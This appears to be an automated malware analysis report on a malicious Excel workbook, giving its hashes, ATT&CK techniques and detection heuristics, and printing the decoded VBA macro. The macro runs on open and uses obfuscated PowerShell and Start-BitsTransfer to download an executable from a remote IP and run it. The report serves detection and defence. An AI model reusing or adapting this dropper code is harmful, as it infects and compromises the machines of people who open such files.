Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 5f5deaa2c2b30c37…

MALICIOUS

Office (OLE) / .XLS

48.5 KB Created: 2021-04-13 13:37:17 Authoring application: Microsoft Excel First seen: 2021-11-07
MD5: bf1cde3491b704cd99a6b95fc8750ff3 SHA-1: f0b2df0a12a17c55ad3f0a51a81d3d1ad1dceba9 SHA-256: 5f5deaa2c2b30c37fe51578f87def10831d3390a6a194f9b6b075a2414f07597
128 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The Workbook_Open VBA macro is designed to stage a PowerShell command that downloads and executes a second-stage payload. The macro constructs a batch file containing a Start-BitsTransfer command to fetch 'officemanage.exe' from 'http://18.156.71.237/hN/5/B/RFQ_5550_178_03309IMG.exe' and then execute it. This indicates a downloader or dropper functionality.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Private Sub Workbook_Open()
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set computeropen = GetObject("new:0D43FE01-F093-11CF-8940-00A0C905422" & CInt(7.6))
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1358 bytes
SHA-256: 6a6cc3b117eb61fb4efeef331437a7057d00f03a5a1144e51bedb40a1227ce72
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
halfnature = "pow^ers"
fishamount = "he^ll"
Set computeropen = GetObject("new:0D43FE01-F093-11CF-8940-00A0C905422" & CInt(7.6))
attentionbill = "C:\Users\Public\Documents\god.bat"
Set computeropen2 = computeropen.CreateTextFile(attentionbill)
computeropen2.WriteLine halfnature & fishamount & " -w hi sl^eep -Se 31;St^a^rt-BitsTr^ans^fer -Source htt`p://18.156.71.237/hN/5/B/RFQ_5550_178_03309IMG.e`xe -Dest C:\Users\Public\Documents\officemanage.e`xe;C:\Users\Public\Documents\officemanage.e`xe"
computeropen2.Close
GetObject("new:13709620-C279-11CE-A49E-44455354000" & CInt(0.3)).Open (attentionbill)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub existstrong()
'
' existstrong Macro
' 1Y9EPHD78LD1
'
End Sub